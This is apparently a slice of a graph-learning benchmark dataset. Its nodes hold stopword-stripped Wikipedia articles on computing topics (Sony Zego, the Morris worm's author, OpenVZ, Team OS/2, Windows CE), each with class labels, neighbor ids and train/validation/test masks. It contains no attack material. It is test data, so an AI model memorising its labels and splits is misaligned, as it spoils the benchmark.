    "text": "Zego:zego zego zest go rackmount server platform built sony targeted video post-production broadcast markets platform based sony playstation 3 features cell processor well rsx 'reality synthesizer aimed greatly speed postproduction work particular computationally extremely taxing 4k resolution 3d rendering video processing respects rather similar ibm qs20/21/22 blades used roadrunner supercomputer took top spot top500 may 2008 although sony seems target dcc digital content creation markets rather scientific like ibm seen inclusion rsx graphics processor zego platform zego runs fixstars yellow dog enterprise linux also sony favourite linux distribution playstation 3 architecture identical playstation 3 one difference bcu-100 1 gb xdr ram instead playstation 3 256 mb video ram missing sony system diagrams listed 256 mb like playstation 3 tech specs xdr memory shared cell rsx sony uses scc super companion chip handle i/o tasks hdd usb 2.0 gigabit ethernet unspecified i/o scc dedicated memory 1gb ddr2 well memory extension adapter connected via pci express hold 8 gb another option single pci express slot video display board dvi-i output cell bcu-100 offers full 8 spus cell manufactured opposed 6 spus available playstation 3 one spu disabled improve manufacturing yields one reserved system gives bcu-100 extra 33 potential cpu-power 51.2 gflops sony presented first zego product bcu-100 public siggraph 2008 mid-august sony plans ship bcu-100 end 2008 deliver mental ray raytracer mental images speed 3d rendering tasks houdini batch side effects software company claims talk software makers dcc field port optimize software zego platform zego similar workstation based playstation 2 architecture called gscube also shown siggraph year 2000 although used visualization movie projects ultimately failed market however gscube targeted realtime visualization 1080p hd zegos target markets much broader encompassing example physics simulation final 3d rendering video processing well visualization remains seen zego actually manages gscube unable worth noting massively parallel design gscube much 16 graphics synthesizer chips dedicated ram inspired design cell processor 8 spus dedicated ram august 2009 device appears discontinued searches sony.com pro.sony.com either zego bcu-100 return nothing year-old press release claiming product would ship within months",
    "neighbors": [
      9472,
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      6033,
      1181,
      9508,
      9126,
      6311,
      9512,
      684,
      7218,
      1587,
      6072,
      8120,
      1985,
      1091,
      9543,
      10056,
      6909,
      6732,
      10316,
      2383,
      3025,
      6738,
      342,
      6873,
      1115,
      859,
      3677,
      4060,
      607,
      9445,
      359,
      8937,
      10985,
      4587,
      3824,
      8316,
      5746,
      6004,
      2293,
      7028,
      1784,
      7801,
      3323,
      6268,
      6781
    ],
    "mask": "None"
  },
  {
    "node_id": 307,
    "label": 4,
    "text": "Computer_Incident_Advisory_Capability:computer incident advisory capability computer incident advisory capability ciac original computer security incident response team department energy ciac formed february 1989 jointly sponsored doe office cio air force primary function ciac name implies advise people computer incidents primarily means security vulnerabilities virus hoax alerts similar information security concerns ciac founding member gfirst government forum incident response security teams first international incident response security organization ciac published incident reports bulletins officially renamed doe-circ relocated las vegas nevada october 2008",
    "neighbors": [
      3479
    ],
    "mask": "None"
  },
  {
    "node_id": 308,
    "label": 8,
    "text": "Dynata:dynata dynata formerly research global online sampling digital data collection company providing market research insights clients initially founded 1999 dallas texas hal brierley mort meyerson company called e-rewards inc. e-rewards grown fast 100,000 clients months named 2007 inc. magazine one america fastest growing companies december 2009 e-rewards inc. acquired research plc co-founded chris havemann andrew cooper headquartered london england time research publicly listed london stock exchange ’ aim market integration process company re-branded globally one name research company went acquire smaller businesses including peanut labs inc. 2010 2015 january 2015 private equity firm court square acquired research group inc. similar time private equity firm hggc acquired majority stake rival market research firm survey sampling international ssi 2017 two pe firms announced would merging two market research firms january 2019 combined research ssi renamed dynata dynata used track online consumer website history look collect data purchasing behavior company also composes proposes surveys users get accurate clarified responses broad-based consumers gathered data company conducts up-to-date market research determine trends occurring around world aside gathering information purchasing behaviors company guarantees protect consumer unauthorized personal data since handheld technology developed become core part society company started look mobile research tools company gives surveys mobile users get idea mobile panel tastes",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 309,
    "label": 3,
    "text": "Operand_forwarding:operand forwarding operand forwarding data forwarding optimization pipelined cpus limit performance deficits occur due pipeline stalls data hazard lead pipeline stall current operation wait results earlier operation yet finished forwarding method exploiting instruction-level parallelism ilp add b c a=b+c two assembly pseudocode instructions run pipeline fetching decoding second instruction pipeline stalls waiting result addition written read cpu control unit must implement logic detect dependencies operand forwarding makes sense multiplexer used select proper register flip-flop read operand",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      477,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 310,
    "label": 4,
    "text": "Robert_Morris_(cryptographer):robert morris cryptographer robert h. morris sr. july 25 1932 – june 26 2011 american cryptographer computer scientist morris born boston massachusetts parents walter w. morris salesman helen kelly morris received bachelor degree mathematics harvard university 1957 master degree applied mathematics harvard 1958 married anne farlow three children together robert tappan morris author 1988 morris worm meredith morris benjamin morris 1960 1986 morris researcher bell labs worked multics later unix morris contributions early versions unix include math library bc programming language program codice_1 password encryption scheme used user authentication encryption scheme invented roger needham based using trapdoor function called key derivation function compute hashes user passwords stored file codice_2 analogous techniques relying different functions still use today 1986 morris began work national security agency nsa served chief scientist nsa national computer security center involved production rainbow series computer security standards retired nsa 1994 told reporter nsa helped fbi decode encrypted evidence description morris clifford stoll book cuckoo egg many readers stoll book remember morris giving stoll challenging mathematical puzzle originally due john h. conway course discussions computer security next number sequence 1 11 21 1211 111221 known look-and-say sequence stoll chose include answer puzzle cuckoo egg frustration many readers robert morris died lebanon new hampshire",
    "neighbors": [
      6369,
      8522,
      7883,
      4303,
      7887,
      11023,
      9298,
      5492,
      6772,
      8502,
      311,
      8632,
      6617,
      8635,
      2558,
      8671
    ],
    "mask": "Validation"
  },
  {
    "node_id": 311,
    "label": 9,
    "text": "Robert_Tappan_Morris:robert tappan morris robert tappan morris born november 8 1965 american computer scientist entrepreneur best known creating morris worm 1988 considered first computer worm internet morris prosecuted releasing worm became first person convicted then-new computer fraud abuse act went co-found online store viaweb one first web-based applications later funding firm combinator—both paul graham later joined faculty department electrical engineering computer science massachusetts institute technology received tenure 2006 elected national academy engineering 2019 morris born 1965 parents robert morris anne farlow morris senior morris computer scientist bell labs helped design multics unix later became chief scientist national computer security center division national security agency nsa morris grew millington section long hill township new jersey graduated delbarton school 1983 morris attended harvard university later went graduate school cornell first year designed computer worm disrupted many computers fledgling internet led indicted year later serving conviction term returned harvard complete ph.d. supervision h.t kung completed ph.d. 1999 morris worm developed 1988 graduate student cornell university released worm mit rather cornell worm exploited several vulnerabilities gain entry targeted systems including worm programmed check computer found determine infection already present however morris believed administrators might try defeat worm instructing computer report false positive compensate possibility morris directed worm copy anyway 14 time matter response infection-status interrogation level persistence design flaw created system loads brought attention system administrators also disrupted target computers ensuing trial estimated cost potential loss productivity caused worm efforts remove different systems ranged 200 53,000 1989 morris indicted violating united states code title 18 computer fraud abuse act first person indicted act december 1990 sentenced three years probation 400 hours community service fine 10,050 plus costs supervision appealed motion rejected following march morris stated motive trial demonstrate inadequacies current security measures computer networks exploiting security defects discovered completed sentence 1994 morris principal research interest computer network architectures includes work distributed hash tables chord wireless mesh networks roofnet longtime friend collaborator paul graham addition founding two companies together graham dedicated book ansi common lisp morris named programming language generates online stores web pages rtml honor graham lists morris one personal heroes saying never wrong",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      6772,
      5751,
      7805,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      7887,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      1783,
      9975,
      11001,
      6906,
      2304,
      4865,
      8960,
      4867,
      3334,
      6919,
      3336,
      1301,
      3867,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      310,
      6969,
      3408,
      6994,
      1365,
      2392,
      4956,
      10083,
      6502,
      11625,
      7539,
      5492,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      1474,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 312,
    "label": 3,
    "text": "F-15_Strike_Eagle_(video_game):f-15 strike eagle video game f-15 strike eagle f-15 strike eagle combat flight simulator originally released atari 8-bit family 1984 microprose ported systems first f-15 strike eagle series followed f-15 strike eagle ii f-15 strike eagle iii arcade version game released simply f-15 strike eagle 1991 uses higher-end hardware available home systems including tms34010 graphics-oriented cpu game begins player selects libya much like operation el dorado canyon persian gulf vietnam mission theater play begins cockpit f-15 already flight equipped variety missiles bombs drop tanks flares chaff player flies plane combat bomb various targets including primary secondary target also engaging air-to-air combat enemy fighters game ends either player plane destroyed player returns base game first released atari 8-bit family ports appearing 1985-87 apple ii commodore 64 zx spectrum msx amstrad cpc also ported ibm pc self-booting disk one first games microprose company released ibm compatibles initial ibm release came self-booting 5.25 floppy disk supported cga graphics revised version 1986 offered 3.5 disks added limited ega support added ability change color palettes ega card present versions game boy game gear nes published early 1990s f-15 sold 250,000 copies march 1987 1.5 million copies overall microprose best-selling commodore game late 1987 computer gaming world 1984 called f-15 excellent simulation excellent documentation stated action fast furious ... graphics excellent game action game year magazine 1985 reader poll 1994 survey wargames magazine gave title two stars five stating first 'classic fighter simulation well loved time extremely dated antic approved atari st version graphical speed improvements ability save progress compute listed game 1988 one favorite games stating makes jet fighter combat nerve-wracking fun time",
    "neighbors": [
      4706,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 313,
    "label": 9,
    "text": "RAMIS_(software):ramis software ramis random access management information system fourth-generation programming language 4gl capable creating maintaining databases consisting named files containing numeric alphabetic fields subsequently producing detailed simple complex reports using simple english like language easily mastered non-programmers typical program either create maintain database create quite complex reports would normally consist handful lines code could written understood non-professional programmers end users became known end users could trained use ramis matter days large companies would often several hundred users scattered throughout company ramis initially developed mid 1960s company mathematica consulting contract marketing study team headed gerald cohen subsequently developed marketed general purpose data management analysis tool late 1960s cohen fell management mathematica left form company shortly thereafter new company released new product called focus similar ramis bugs misspelled error messages national css ncss time-sharing vendor licensed rights make ramis available vp/css system point mathematica changed licensing price interested parties programming team remained mathematica almost sales force time ramis double digits client companies us european division headquartered london mathematica decided create new division called mathematica products group rename product ramis ii time company decided recall frank fish originally mathematica consultant assigned lead european consulting team subsequently formed european ramis group head ramis ii design team international sales sales ramis ii focus continued grow 1980s throughout western world ramis ii generally outselling focus mainframes though detailed figures available ramis ii eventually installed 40 countries worldwide mathematica eventually grew 500 staff roughly 200 involved ramis ii company largely owned group professors mathematics economics princeton university group aged opted cash selling martin marietta corporation subsequently lockheed martin 1983 ramis ii continued grow another 4 years top people ramis ii design sales quit reaction policy changes imposed lockheed martin roughly 2 years later lockheed martin sold ramis ii group another software firm whose background culture different mathematica unable make success product turn sold product another company maintenance revenue 1987 ramis sold on-line software international acquired current owners computer associates time company purchased computer associates ca technologies results ramis syntax described initial timesharing/mainframe product positively accepted initial pc version n't get reception",
    "neighbors": [
      4042,
      10803,
      11075,
      5678
    ],
    "mask": "Train"
  },
  {
    "node_id": 314,
    "label": 2,
    "text": "Team_OS/2:team os/2 team os/2 advocacy group formed promote ibm os/2 operating system originally internal ibm formal ibm support team os/2 successfully converted grassroots movement formally supported directed ibm consisting well ten thousand os/2 enthusiasts within without ibm one earliest examples online viral phenomenon cause attracting supporters primarily online communications decline team os/2 largely coincided ibm abandonment os/2 coinciding attacks orchestrated microsoft os/2 team os/2 ibm early attempts online evangelism team os/2 significant factor spread acceptance os/2 formed february 1992 team os/2 began ibm employee dave whittle recently appointed ibm evangelize os/2 online formed internal ibm discussion group titled teamos2 forum ibm worldwide network time served individuals academic internet forum header stated purpose forum went viral increasing numbers ibmers worldwide began contribute wide variety ideas ibm could effectively compete microsoft establish os/2 industry standard desktop operating system within short time thousands ibm employees added words teamos2 internet phone directory listing enabled anyone within ibm find like-minded os/2 enthusiasts within company work together overcome challenges posed ibm size insularity top-down marketing style teamos2 forum quickly caught attention ibm executives including lee reiswig lucy baney initial scepticism offered moral financial support whittle grass roots online marketing efforts ibm official program generating word-of-mouth enthusiasm called os/2 ambassador program os/2 enthusiasts company-wide could win gold silver bronze ambassador pins corporate recognition various levels structured achievement os/2 ambassador program team os/2 effective evangelizing os/2 within ibm team os/2 effective generating support promotion os/2 outside ibm whittle began extend team os/2 effort outside ibm various posts compuserve prodigy bulletin boards newsgroups venues also made proposal ibm executives eventually implemented ibm personal software products moved austin texas form grass roots marketing department team os/2 went external spring first team os/2 party held chicago ibm marketing office chicago created huge banner visible streets microsoft reacted steve ballmer roamed floor application diskette specially programmed crash os/2 os/2 enthusiasts gathered evening excitement first team os/2 party tickets limited requested one online discussion groups attendees asked nominate favorite teamer team os/2 hall fame whose names drawn came forward tell story nominee sacrifice made promote os/2 deserving recognition prizes included limousine rides evening end attendees received first team os/2 t-shirt includes first team os/2 logo front distinctive ibm blue-stripe logo back except lower-case letters ibm/2 represent new ibm even lead singer band chicago provided music event asked could t-shirt member band one ibm executive attendance said first ibm event given goosebumps word team os/2 phenomenon spread even quickly within ibm without os/2 enthusiasts spread word computer user groups across united states eventually worldwide independently ibm marketing efforts whittle established multiple localized forums within ibm teamny teamdc teamfl teamtx teamca attracted new supporters enabled enthusiastic followers share ideas success stories plan events creatively apply learning one another teamer invasion comdex fall 1993 perhaps high water mark team os/2 comdex time important computer electronics trade show held las vegas wearing salmon-colored shirts become associated team os/2 group members led doug azzarito keith wood mike kogan ibm user group manager gene barlow others wandered convention floors promoting os/2 providing demo discs vendors offering install distributed version os/2 display computers many team os/2 volunteers traveled convention including overseas independence grass-roots enthusiasm attracted significant attention media amongst exhibitors little funding ibm provided went provide shirts trinkets trash onsite headquarters teamers coordinate efforts collect items give vendors ibm established grass roots marketing department proposed earlier even tapped vicci conway janet gobeille provide support guidance team os/2 whittle voluntarily stepping aside previous day-to-day focus supporting monitoring team os/2 activities janet nicknamed team godmother everyone ibm especially whittle wary trying direct volunteers make team os/2 structured formal order avoid breaking something works according team os/2 frequently asked questions document team os/2 one point presence sponsoring members willing publish e-mail addresses points contact argentina australia austria belgium canada denmark germany ireland japan latvia netherlands portugal singapore south africa spain sweden switzerland united kingdom well online america online compuserve delphi fidonet genie internet/usenet/mail servers prodigy wwivnet article analyzing team os/2 meaning context robert l. scheier listed several factors led success group included creation strong group identity powerful name corporate support without corporate direction ability volunteer members things companies could n't keeping loose relatively unstructured providing lots smaller material rewards without compensation listening team members eyes ears public however team os/2 lack structure left vulnerable various journalists documented dirty tricks campaign microsoft online numerous individuals nicknamed microsoft munchkins john c. dvorak used pseudonyms attack os/2 manipulate online discussions whittle target widespread online character assassination campaign journalists less enthusiastic os/2 received death threats nasty emails numerous sources identified taglines team os/2 without name whether attack pattern part microsoft efforts team os/2 identity never proven ultimately least microsoft efforts exposed zachmann canopus forum compuserve owner one particular account ostensibly belonging steve barkto attacking os/2 david barnes whittle os/2 fans discovered funded credit card rick segal high-level microsoft employee evangelist also active forums james fallows nationally renowned journalist weighed state stylistic fingerprint found barkto posts almost certainly match stylistic fingerprints microsoft evangelist postings zachmann sent open letter steve ballmer futilely demanding public investigation business practices publicly traded microsoft height marketing effort team os/2 consisted ten thousand known members countless undocumented members ibm acknowledged publicly without team os/2 might fourth generation warp 4 operating system however ibm marketing director grass roots marketing department made decision meet headcount cut targets eliminating entire department one week 1995 fall comdex microsoft executives said positively gleeful team os/2 members worldwide said incredulous within months whittle barlow left ibm conway gobeille reassigned within ibm teamers crushed ibm announcement marketing individual desktop versions would come close team members eventually migrated away os/2 linux offered power stability come expect os/2 much learned team os/2 inspired least linux open source movements microsoft attempted fabricate team nt comdex fall 1995 widely ridiculed blatant attempt impersonation team nt members microsoft employees called team nice try industry pundits spencer f. katt pen name various contributors paul connolly pcweek magazine microsoft readying first version windows nt designated version 3.1 1993 texas computer user group hal-pc invited ibm microsoft public shootout two operating systems videotape two demonstrations later distributed ibm team os/2 members compared dynamic presentation given david barnes put os/2 paces microsoft presenter nt showed poorly microsoft demanded portions nt presentation cut videotapes ibm distributing event resulted issuance edited version tape hundreds original complete copies already released uncut version os/2 nt shootout tape dubbed os/2 nt shootdown shootdown flight 31 tape used train professional software hardware presenters might face user groups",
    "neighbors": [
      3323,
      8092,
      4331
    ],
    "mask": "Test"
  },
  {
    "node_id": 315,
    "label": 9,
    "text": "Embedded_Visual_Basic:embedded visual basic embedded visual basic evb implementation microsoft visual basic geared towards generating programmes embedded systems pdas cellular telephones modern pocket computers programmable electronic systems devices generally use windows ce tools run desktop operating systems windows 98 windows nt windows xp subsequent tools also capable compiling executables windows nt embedded well embedded visual basic available microsoft tools including embedded visual c++ evc++ discussed wikipedia article microsoft visual c++ embedded visual j++ evj++ well development tools relational database system windows ce de facto visual foxpro replacement centrally important windows ce-related tool activesync allows access device desktop computer well control panel functionality e.g install uninstall programmes amongst tools version regedit windows ce implementations tools provide objects components used write programmes automate microsoft office pocket versions would one way get scripting macro capability pocket office suite embedded visual interdev version msdn visual source safe ported windows ce means obtaining visual basic functionality windows ce install windows script host implementation non-default install available installation cd-rom version 3 embedded visual basic visual j++ visual c++ tools approximate language implementation visual basic 6.0 visual j++ 6.0 visual c++ 6.0 cd-roms installation tools provided free microsoft update latter version 4.5 also available programming tools .net systems also produced microsoft one basic development tool run board windows ce machines third-party ns basic",
    "neighbors": [
      7691,
      22,
      8227,
      4136,
      9263,
      11315,
      6709,
      8246,
      4160,
      4674,
      4174,
      83,
      603,
      92,
      608,
      5733,
      5747,
      6778,
      5754,
      3718,
      10900,
      11412,
      10902,
      11414,
      3736,
      9881,
      3233,
      7343,
      7355,
      7870,
      712,
      5320,
      9434,
      11498,
      3821,
      8429,
      10991,
      759,
      6910,
      1805,
      9997,
      8976,
      786,
      11030,
      5401,
      797,
      4384,
      5925,
      11559,
      8494,
      303,
      11570,
      7486,
      321,
      1347,
      1348,
      847,
      1366,
      1879,
      2401,
      2915,
      7523,
      2943,
      7064,
      3481,
      11683,
      8101,
      4010,
      10666,
      10157,
      11229,
      8161,
      9188,
      11243,
      2541,
      3573,
      9205,
      10750,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 316,
    "label": 4,
    "text": "Mile2:mile2 mile2 information technology security company develops provides proprietary accredited cybersecurity certifications company technology security programs utilized private public sectors including boeing canada department national defense national security agency united states air force committee national security systems cnss u.s. federal bureau investigation others mile2 developed provides 15 internationally recognized proprietary cybersecurity certifications accredited cnss 4011-4016 approved national initiative cybersecurity security careers studies niccs training schedule department homeland security january 13 2013 mile2 entered collaborative partnership merit network provide cybersecurity courseware certifications michigan cyber range company also involved training u.s. veterans private sector opportunities cybersecurity holding training sessions veterans around nation",
    "neighbors": [
      9088,
      10307,
      357,
      9607,
      7528,
      8462,
      7887,
      5010,
      1493,
      3447,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 317,
    "label": 8,
    "text": "WS-Federation_Passive_Requestor_Profile:ws-federation passive requestor profile ws-federation passive requestor profile web services specification intended work ws-federation specification defines identity authentication authorization mechanisms work across trust realms specification deals specifically applications web browsers make requests using mechanisms context web-browser known passive requestor way contrast ws-federation active requestor profile deals active requestors soap-enabled applications ws-federation passive requestor profile created ibm bea systems microsoft verisign rsa security",
    "neighbors": [
      11040,
      10020,
      7878,
      2154,
      10486,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 318,
    "label": 2,
    "text": "OpenVZ:openvz openvz open virtuozzo operating-system-level virtualization technology linux allows physical server run multiple isolated operating system instances called containers virtual private servers vpss virtual environments ves openvz similar solaris containers lxc virtualization technologies vmware xen provide full virtualization run multiple operating systems different kernel versions openvz uses single linux kernel therefore run linux openvz containers share architecture kernel version disadvantage situations guests require different kernel versions host however overhead true hypervisor fast efficient memory allocation openvz soft memory used one virtual environment used others disk caching old versions openvz used common file system virtual environment directory files isolated using chroot current versions openvz allow container file system openvz kernel linux kernel modified add support openvz containers modified kernel provides virtualization isolation resource management checkpointing vzctl 4.0 openvz work unpatched linux 3.x kernels reduced feature set container separate entity behaves largely physical server would openvz resource management consists four components two-level disk quota fair cpu scheduler disk i/o scheduler user bean counters see resources changed container run time eliminating need reboot container disk quotas measured terms disk blocks inodes roughly number files within container possible use standard tools set unix per-user per-group disk quotas cpu scheduler openvz two-level implementation fair-share scheduling strategy first level scheduler decides container give cpu time slice based per-container cpuunits values second level standard linux scheduler decides process run container using standard linux process priorities possible set different values cpus container real cpu time distributed proportionally values addition openvz provides ways similar cpu scheduler described i/o scheduler openvz also two-level utilizing jens axboe cfq i/o scheduler second level container assigned i/o priority scheduler distributes available i/o bandwidth according priorities assigned thus single container saturate i/o channel user beancounters set per-container counters limits guarantees meant prevent single container monopolizing system resources current openvz kernels rhel6-based 042stab* two primary parameters ram swap a.k.a physpages swappages others optional resources mostly memory various in-kernel objects inter-process communication shared memory segments network buffers resource seen /proc/user_beancounters five values associated current usage maximum usage lifetime container barrier limit fail counter meaning barrier limit parameter-dependent short thought soft limit hard limit resource hits limit fail counter increased allows owner detect problems monitoring /proc/user_beancounters container live migration checkpointing feature released openvz middle april 2006 makes possible move container one physical server another without shutting container process known checkpointing container frozen whole state saved file disk file transferred another machine container unfrozen restored delay roughly seconds state usually preserved completely pause may appear ordinary computational delay default openvz restricts container access real physical devices thus making container hardware-independent openvz administrator enable container access various real devices disk drives usb ports pci devices physical network cards /dev/loopn often restricted deployments loop devices use kernel threads might security issue restricts ability mount disk images work-around use fuse openvz limited providing vpn technologies based ppp pptp/l2tp tun/tap ipsec supported inside containers since kernel 2.6.32 graphical user interface called easyvz attempted 2007 progress beyond version 0.1 version 3.4 proxmox could used openvz-based server virtualization environment gui although later versions switched lxc",
    "neighbors": [
      6150,
      4616,
      6153,
      2058,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      7733,
      4161,
      5697,
      8772,
      6213,
      5702,
      8268,
      589,
      7248,
      593,
      2645,
      10851,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      11410,
      2195,
      2711,
      6808,
      9882,
      1694,
      3742,
      2723,
      2212,
      8364,
      7349,
      10933,
      5815,
      700,
      2236,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      5356,
      10482,
      2804,
      2294,
      8439,
      2809,
      2811,
      8447,
      5378,
      6918,
      4360,
      1291,
      4367,
      4368,
      8466,
      792,
      10016,
      6438,
      295,
      10537,
      7983,
      9525,
      823,
      6968,
      7992,
      3911,
      4423,
      8520,
      6988,
      10063,
      1362,
      7507,
      5975,
      11095,
      11097,
      2910,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      10138,
      11678,
      7584,
      1444,
      1445,
      5029,
      935,
      9637,
      4521,
      4011,
      1456,
      1972,
      9655,
      5049,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      499,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 319,
    "label": 2,
    "text": "Microsoft_Assistance_Markup_Language:microsoft assistance markup language microsoft assistance markup language microsoft aml generally referred maml xml-based markup language developed microsoft user assistance platform team provide user assistance online help microsoft windows vista operating system maml also used provide help information powershell cmdlets modules advanced functions maml departure previous types user assistance windows operating systems features available .net framework 2 options shipped release .net framework 3 previously user assistance windows operating systems used files created command line compiler hhc.exe compiler used compile .hhp project file .hhc table contents file .hhk index file collection html topic files related resources css javascript image files one .chm file significant aspect maml shifts production user assistance concept structured authoring somewhat similar dita docbook documents constituent elements defined context maml emphasis content tasks user performs computer features software presentation managed part rendering engine user requests topic maml authoring structure divided segments related type content conceptual faq glossary procedure reference reusable content task troubleshooting tutorial present microsoft released automated tools assist creation maml need create xml files hand three levels transformation occur topic displayed structure presentation rendering unfortunately decent tool available pros author maml use notepad pretty tedious james o'neil former msft employee shows use infopath author information far perfect article suggests",
    "neighbors": [
      9505,
      1347,
      9,
      2221,
      11023,
      7539,
      4564,
      345,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 320,
    "label": 3,
    "text": "Nightshade_(1985_video_game):nightshade 1985 video game nightshade action video game developed published ultimate play game first released zx spectrum 1985 ported amstrad cpc bbc micro later year also ported msx exclusively japan 1986 game player assumes role knight sets destroy four demons plague-infested village game features flip-screen isometric gameplay similar vein predecessors knight lore alien 8 addition nightshade features enhanced version ultimate play game filmation game engine branded filmation ii game received positive reviews upon release critics praised gameplay traits graphics colours however one critic divided perceived similarities predecessors game presented isometric format player assumes role knight enters plague-infested village nightshade vanquish four demons reside within additionally residents village transformed vampires supernatural creatures contact monsters infects knight repeated contact turning character white yellow green lead character death knight may hit three times enemy however fourth hit result life deducted objective game locate destroy four specific demons demon vulnerable particular object must collected player hammer bible crucifix hourglass four items collected player must track specific demon cast correct item order destroy four demons destroyed game end order defend enemies vampires monsters player arm antibodies thrown enemies antibodies found houses around village slowly deplete used player collectible items include extra lives boots latter enables player character run faster speed ultimate play game founded brothers tim chris stamper along tim wife carol headquarters ashby-de-la-zouch 1982 began producing multiple video games zx spectrum throughout early 1980s company known reluctance reveal details operations upcoming projects little known development process except used work separate teams one team would work graphics whilst would concentrate aspects sound programming journalist reviewing nightshade crash asked tim chris stamper object game responded oh ca n't tell game developed isometric projection game engine known filmation ii upgraded version filmation engine filmation engine created stamper brothers portray 3d imagery filmation ii used image masking technique drew filled holes background allowing game create composite structures pixelated drawings without visual overlay despite limitations platforms zx spectrum offered nightshade first released united kingdom zx spectrum 1985 ported amstrad cpc bbc micro later year also ported msx exclusively japan 1986 game received positive reviews upon release chris bourne sinclair user praised game new graphics system opining wonderfully detailed juiced contrast predecessors knight lore alien 8 reviewer writing computer video games praised graphics great stated sound effects standard considering dumb zx spectrum philippa irving crash thought visuals use colours stunning ultimate play game usual standards however notice instances attribute clash reviewer writing computer gamer asserted graphics good ever however admitted game seemed lacking comparison ultimate play game recent releases chris jenkins popular computing weekly opined game interior visuals looked like featureless squares however admitted game background drops detailed gameplay also praised reviewers bourne opined game well-paced similar vein arcade-style games however noted sense déjà vu game concept stating developer games starting wear thin reviewer computer video games appreciated nightshade nice touches summarising instant classic ultimate play game irving criticised lack instructions hints came game stated nightshade set new standards programming unlike knight lore alien 8 however irving admitted game still another technically brilliant game reviewer computer gamer enjoyed wide range gameplay elements stating enough hold attention hours reviewer home computing weekly stated gameplay addictive knight lore alien 8 due game lack obstacles jenkins praised game use new engine filmation ii stating ahead everything else zx spectrum",
    "neighbors": [
      4102,
      9191,
      2792,
      9254,
      9006,
      10931,
      4278,
      5820,
      2173
    ],
    "mask": "Test"
  },
  {
    "node_id": 321,
    "label": 3,
    "text": "Windows_Embedded_Compact:windows embedded compact windows embedded compact formerly windows embedded ce windows ce operating system subfamily developed microsoft part windows embedded family products unlike windows embedded standard based windows nt windows embedded compact uses different hybrid kernel microsoft licenses windows ce original equipment manufacturers oems modify create user interfaces experiences windows ce providing technical foundation current version windows embedded compact supports x86 arm processors board support package bsp directly mips shx architectures support prior version 7.0 7.0 still works mipsii architecture windows ce optimized devices minimal memory windows ce kernel may run one megabyte memory devices often configured without disk storage may configured closed system allow end-user extension instance burned rom windows ce conforms definition real-time operating system deterministic interrupt latency version 3 onward system supports 256 priority levels uses priority inheritance dealing priority inversion fundamental unit execution thread helps simplify interface improve execution time first version known development code name pegasus featured windows-like gui number microsoft popular apps trimmed smaller storage memory speed palmtops day since windows ce evolved component-based embedded real-time operating system longer targeted solely hand-held computers many platforms based core windows ce operating system including microsoft autopc pocket pc 2000 pocket pc 2002 windows mobile 2003 windows mobile 2003 se windows mobile 5 windows mobile 6 smartphone 2002 smartphone 2003 portable media center zune windows phone many industrial devices embedded systems windows ce even powered select games dreamcast operating system gizmondo handheld partially run modified xbox game consoles distinctive feature windows ce compared microsoft operating systems large parts offered source code form first source code offered several vendors could adjust hardware products like platform builder integrated environment windows ce os image creation integration customized operating system designs based ce offered several components source code form general public however number core components need adaptation specific hardware environments cpu family still distributed binary form windows embedded compact formerly known windows ce according microsoft ce explicit acronym anything although implies number notions windows developers mind compact connectable compatible companion efficient name changed 2006 release windows embedded ce 6.0 2011 release windows embedded compact 7 windows ce originally announced microsoft comdex expo 1996 demonstrated stage bill gates john mcgill microsoft testing pegasus early 1995 released strict reference platform several hardware partners devices following minimum hardware specifications devices time mainly 480×240 pixel displays exception hewlett-packard 'palmtop pc 640×240 display window took full display navigation done tapping double tapping item contextual menu also available user pressing alt key tapping screen windows ce 1.0 include cascading start menu unlike windows 95 windows nt 4.0 microsoft released windows ce 1.0 power toys included cascading menu icon appeared system tray 